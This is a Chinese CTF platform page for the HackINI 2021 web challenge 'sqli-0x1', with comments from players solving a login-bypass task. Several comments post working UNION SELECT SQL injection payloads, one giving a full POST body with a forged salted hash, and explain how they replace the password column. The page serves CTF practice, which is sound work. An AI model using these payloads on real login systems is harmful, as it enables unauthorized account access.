sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2266
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

评论
出题人我会一直让你等着 1月前

admin' UNION SELECT 1, 'admin', '21232f297a57a5a743894a0e4a801fc3'# 为什么这个会被检测出来

回复 0

Zpfhh 2月前

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 1

cfggfbfxdgbb 3月前

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0

hengdonghui 3月前

格式是: shellmates{********} 不是flag{******}格式。

回复 0

白乐 3月前

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 3月前

/?pls_help,审计代码

回复 0

Alune 4月前

加盐密码哈希

回复 0

15031597817 6月前

这个登上以后不出flag咋办

回复 1

a543589796 6月前

这道题为什么sqlmap跑不出来啊?

回复 0

lunarbyside 10月前

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4

Systems 1年前

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 4

WriteUp

image
a2cai

2 金币

评分(28)

解题动态

shikeerzhi 攻破了该题 4小时前
TTTT4566 攻破了该题 22小时前
是万叶秋吖 攻破了该题 22小时前
Byronyf 攻破了该题 23小时前
hyj11125 攻破了该题 1天前
aabo_cloud 攻破了该题 1天前
wuyangwing 攻破了该题 1天前
kylee 攻破了该题 2天前
向前110 攻破了该题 2天前
Agaric 攻破了该题 2天前
无情的白给机器人 攻破了该题 2天前
two_k 攻破了该题 3天前
un 攻破了该题 4天前
破晓101 攻破了该题 4天前
luyouqi 攻破了该题 5天前
小城阿扬 攻破了该题 5天前
JJagaew 攻破了该题 5天前
司徒草青 攻破了该题 6天前
ddddddddddd 攻破了该题 6天前
CopperKoi 攻破了该题 6天前
问题反馈